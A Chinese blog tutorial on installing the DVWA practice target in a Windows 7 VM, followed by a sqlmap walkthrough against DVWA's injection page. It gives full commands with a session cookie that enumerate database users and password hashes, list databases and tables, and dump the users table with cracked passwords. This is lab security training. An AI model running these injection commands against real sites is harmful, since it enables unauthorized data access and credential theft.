文档章节

搭建DVWA测试环境和SQL注入之SQLmap入门

binhu
 binhu
发布于 2017/08/03 08:40
字数 1889
阅读 234
收藏 1
点赞 0
评论 0

DVWA是一款渗透测试的演练系统,在圈子里是很出名的。如果你需要入门,并且找不到合适的靶机,那我就推荐你用DVWA。

我们通常将演练系统称为靶机,下面请跟着我一起搭建DVWA测试环境。如果你有一定的基础,可以直接看下面一章节。

0x00 前言


我这里用的是win7 系统,为啥要用win7。因为刚好我这里有现成的系统。其实你用windows 2008 等等的都是可以的。

我只是用win7 举个栗子,请看好下面。

0x01 VMware安装

为什么我要说下VMware的安装?因为VMware能够帮助你,更加方便的搭建DVWA。

下面是VMware的下载链接:

1

http://sw.bos.baidu.com/sw-search-sp/software/a08321b624453/VMware_workstation_full_12.5.2.exe

下载后运行,安装。安装教程如下:

http://jingyan.baidu.com/article/90895e0f95a07564ec6b0bc7.html

0x02 Win7安装

请把Win7下载好。

https://www.microsoft.com/zh-cn/download/details.aspx?id=5842

然后在虚拟机中配置。

1

http://jingyan.baidu.com/article/ff4116259a1e7d12e48237ad.html

0x03 安装PHP集成环境

我这里用的是phpstudy 2016,这个使用起来比较方便。下面是现在的最新版。

1

http://www.phpstudy.net/phpstudy/phpStudy20161103.zip

下载后然后放在安装好的Win7种执行。

安装起来比较容易,一直点下一步。然后会有初始化的提示点击是。

看的如下的窗口说明你安装成功了。

0x04安装DVWA 

从这里面进行下载。

1

https://github.com/ethicalhack3r/DVWA

 

把下载好的DWVA的压缩包,放在C:\phpStudy\WWW中(因为我将phpStudy安装在C盘,所以是C:\phpStudy),然后解压DWVA的压缩包。

 

 

 下一步。需要配置DVWA链接数据库,请打开config文件夹,打开config.inc.php。

 

 需要把db_password 修改成 root ,因为咱们刚安装好的集成环境默认的MYSQL 链接用户名和密码为 root root。修改后别忘了保存。

 

 0x05 让我们登陆DVWA 

需要找到自己的本机IP,然后记下来。

 

 最后用浏览器访问 http://192.168.0.5/DVWA-master/index.php (我这里的IP是 192.168.0.5),选择箭头所指。

 

 将新打开的页面往下拉,点击箭头所指。

 

 创建成功。哈哈。

 

然后咱们再次访问 http://192.168.0.5/DVWA-master/login.php 需要输入用户名密码。默认用户名 admin 默认密码 password。

 

 

 最后成功登陆DVWA,OK,撒花。

 本章到此就完了,下章为DWVA 的配置和暴力破解靶机。

 

===============================================================

什么是SQLmap?

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。

读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/

SQLmap的作者是谁?

Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过bernardo@sqlmap.org与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过miroslav@sqlmap.org与他联系。

同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。

执行SQLmap的命令是什么?

进入sqlmap.py所在的目录,执行以下命令:

#python sqlmap.py -h

(译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧)

SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。

如何使用SQLmap:

为方便演示,我们创建两个虚拟机:

1、受害者机器, windows     XP操作系统,运行一个web服务器,同时跑着一个包含漏洞的web应用(DVWA)。

2、攻击器机器,使用Ubuntu     12.04,包含SQLmap程序。

本次实验的目的:使用SQLmap得到以下信息:

3、枚举MYSQL用户名与密码。

4、枚举所有数据库。

5、枚举指定数据库的数据表。

6、枚举指定数据表中的所有用户名与密码。

使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,这里使用Firefox中名为“TamperData”的add-on获取。

SQL入门

当前得到的cookie为“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。

为方便演示,我们将DVWA安全等级设置为low:

SQL入门

接下来我们进入页面的“SQL Injection”部分,输入任意值并提交。可以看到get请求的ID参数如下:

“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

因此该页面就是我们的目标页面。

以下命令可以用来检索当前数据库和当前用户:

“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

使用选项:

1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”

2、-u : 指定目标URL

3、-b : 获取DBMS banner

4、–current-db : 获取当前数据库

5、–current-user:获取当前用户

结果如下:

SQL入门

可以看到结果如下:

DBMS : MySQLversion 5.0
OS versionUbuntu 12.04
current user:root
current db :DVWA

以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”

使用选项:

1、–string : 当查询可用时用来匹配页面中的字符串

2、–users : 枚举DBMS用户

3、–password : 枚举DBMS用户密码hash

SQL入门

结果如下:

databasemanagement system users [142]:
[*] ”@’kingasmk’
[*]”@’localhost’
[*]‘debian-sys-maint’@'localhost’
[*]‘phpmyadmin’@'localhost’
[*]‘root’@’127.0.0.1′
[*] ‘root’@'::1′
[*]‘root’@'kingasmk’
[*]‘root’@'localhost’

数据库管理系统用户和密码hash:

[*]debian-sys-maint [1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] phpmyadmin[1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] root [4]:
password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

读者可以使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”

使用选项:

  • –dbs: 枚举DBMS中的数据库

SQL入门

结果如下:

availabledatabases [5]:
[*]dvwa
[*]information_schema
[*]mysql
[*]performance_schema
[*]phpmyadmin

下面我们尝试枚举DVWA数据表,执行以下命令:

“sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”

使用选项:

1、-D : 要枚举的DBMS数据库

2、–tables     : 枚举DBMS数据库中的数据表

SQL入门

得到结果如下:

Database: dvwa
[2 tables]
+————+
| guestbook |
| users |
+————+

下面获取用户表的列,命令如下:

 “sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”

使用选项:

  • -T : 要枚举的DBMS数据库表

  • –columns : 枚举DBMS数据库表中的所有列

SQL入门

结果如下:

Database: dvwa
Table: users
[6 columns]
+————+————-+
| Column | Type|
+————+————-+
| avatar |varchar(70) |
| first_name |varchar(15) |
| last_name |varchar(15) |
| password |varchar(32) |
| user |varchar(15) |
| user_id |int(6) |
+————+————-+

如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”

使用选项:

  • -T : 要枚举的DBMS数据表

  • -C: 要枚举的DBMS数据表中的列

  • –dump : 转储DBMS数据表项

SQLmap会提问是否破解密码,按回车确认:

SQL入门

得到所有用户名与明文密码如下:

Database: dvwa
Table: users
[5 entries]
+———+———+———————————————+
| user_id | user| password |
+———+———+———————————————+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+———+———+———————————————+

这时我们就可以利用admin帐户登录做任何事了。

总结:

SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。

© 著作权归作者所有

共有 人打赏支持
binhu
粉丝 17
博文 196
码字总数 199655
作品 0
合肥
任何事情,努力才有可能,新书《网络安全实战-sqlmap从入门到精通》目录及架构

最早的时候,仅仅是想在sqlmap上面多做一些研究,后面研究越来越深入,做了sqlmap安全实战专栏,再后来觉得专栏内容会做到30+篇文章,昨天晚上构思了一下,觉得可以整理成一本书,算是今年的...

simeon2005 ⋅ 前天 ⋅ 0

兽哥出品---->sqlmap注入,杀入靶机

Sqlmap 实践----->怼自己的靶机 今天兽哥准备拿出来点干货给大家尝尝,是咸是甜自任君品尝 靶机之前已经文章说过 用phpstudy 链接 dvwa 搭建一个环境 而后呢,我们要使用抓包软件抓一下dvwa的...

D1丶NA ⋅ 2017/07/11 ⋅ 0

记一次初级dvwa爆库

一 前期准备 1 sqlmap在windows环境下需要python2.7的支持,在python官网下载即可 https://www.python.org/ 2 安装python2.7,默认即可。安装完成后需要配置下环境变量。右击计算机->高级系统...

嘻哈music ⋅ 2017/07/10 ⋅ 0

SQL注入之SQLmap入门(转自freebuf)

具体见: http://www.freebuf.com/articles/web/29942.html 用户手册: http://drops.wooyun.org/tips/143 http://drops.wooyun.org/tips/401 什么是SQLmap? SQLmap是一款用来检测与利用SQL......

添加软件 ⋅ 2014/05/18 ⋅ 2

DVWA下的盲注

LOW难度!!! 所需工具: DVWA环境、抓包工具、sqlmap 抓包工具用fiddler为例。 ===================================== 先进入DVWA调整模式为LOW 打开抓包工具,确定可以抓到http流量包 DV...

晨风灬 ⋅ 2017/07/10 ⋅ 0

SQL注入之SQLmap入门

什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于S...

fzxu_05 ⋅ 2015/12/10 ⋅ 0

VMware + JunOS + Linux 搭建安全测试平台

众所周知VMareWorkStion 是一个强大的桌面型的虚拟化软件,比较可以建立Windows虚拟机、Linux虚拟机、甚至各网络操作系统,比如CISCO ASA 、Juniper SRX等。并且可以利用VMWare自身的虚拟网卡...

arckyli ⋅ 2017/09/26 ⋅ 0

Backtrack5 SQL注入漏洞探测

SQLMAP,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。 SQLMAP采用四种独特的SQL注入技术,分别是...

Tar0 ⋅ 2013/10/20 ⋅ 0

【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF IN

伪静态页面不能注入,这是错误的! SQLMAP自动注入08-----ENUMERATION --current-user --current-db --hostname --users --privileges -U username (CU当前账号) --roles --dbs --tables,-......

安全牛课堂 ⋅ 2017/11/28 ⋅ 0

【安全牛学习笔记】SQLMAP- 自动注入

课时92 SQLMAP- 自动注入 SQLMAP自动注入 开源sql注入漏洞检测、利用工具 检测动态页面中get/post参数、cookie、http头 数据榨取 文件系统访问 操作系统命令执行 引擎强大、特性丰富 Xss漏洞...

安全牛课堂 ⋅ 2017/11/29 ⋅ 0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

005. 深入JVM学习—Java堆内存参数调整

1. JVM整体内存调整图解(调优关键) 实际上每一块子内存区域都会存在一部分可变伸缩区域,其基本流程:如果内存空间不足,则在可变的范围之内扩大内存空间,当一段时间之后,内存空间不紧张...

影狼 ⋅ 15分钟前 ⋅ 0

内存障碍: 软件黑客的硬件视图

此文为笔者近日有幸看到的一则关于计算机底层内存障碍的学术论文,并翻译(机译)而来[自认为翻译的还行],若读者想要英文原版的论文话,给我留言,我发给你。 内存障碍: 软件黑客的硬件视图...

Romane ⋅ 48分钟前 ⋅ 0

SpringCloud 微服务 (七) 服务通信 Feign

壹 继续第(六)篇RestTemplate篇 做到现在,本机上已经有注册中心: eureka, 服务:client、order、product 继续在order中实现通信向product服务,使用Feign方式 下面记录学习和遇到的问题 贰 or...

___大侠 ⋅ 今天 ⋅ 0

gitee、github上issue标签方案

目录 [TOC] issue生命周期 st=>start: 开始e=>end: 结束op0=>operation: 新建issueop1=>operation: 评审issueop2=>operation: 任务负责人执行任务cond1=>condition: 是否通过?op3=>o......

lovewinner ⋅ 今天 ⋅ 0

浅谈mysql的索引设计原则以及常见索引的区别

索引定义:是一个单独的,存储在磁盘上的数据库结构,其包含着对数据表里所有记录的引用指针. 数据库索引的设计原则: 为了使索引的使用效率更高,在创建索引时,必须考虑在哪些字段上创建索...

屌丝男神 ⋅ 今天 ⋅ 0

String,StringBuilder,StringBuffer三者的区别

这三个类之间的区别主要是在两个方面,即运行速度和线程安全这两方面。 首先说运行速度,或者说是, 1.执行速度 在这方面运行速度快慢为:StringBuilder(线程不安全,可变) > StringBuffer...

时刻在奔跑 ⋅ 今天 ⋅ 0

java以太坊开发 - web3j使用钱包进行转账

首先载入钱包,然后利用账户凭证操作受控交易Transfer进行转账: Web3j web3 = Web3j.build(new HttpService()); // defaults to http://localhost:8545/Credentials credentials = Wallet......

以太坊教程 ⋅ 今天 ⋅ 0

Oracle全文检索配置与实践

Oracle全文检索配置与实践

微小宝 ⋅ 今天 ⋅ 0

mysql的分区和分表

1,什么是mysql分表,分区 什么是分表,从表面意思上看呢,就是把一张表分成N多个小表,具体请看mysql分表的3种方法 什么是分区,分区呢就是把一张表的数据分成N多个区块,这些区块可以在同一...

梦梦阁 ⋅ 今天 ⋅ 0

exception.ZuulException: Forwarding error

错误日志 com.netflix.zuul.exception.ZuulException: Forwarding error Caused by: com.netflix.hystrix.exception.HystrixRuntimeException: xxx timed-out and no fallback available. Ca......

jack_peng ⋅ 今天 ⋅ 0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部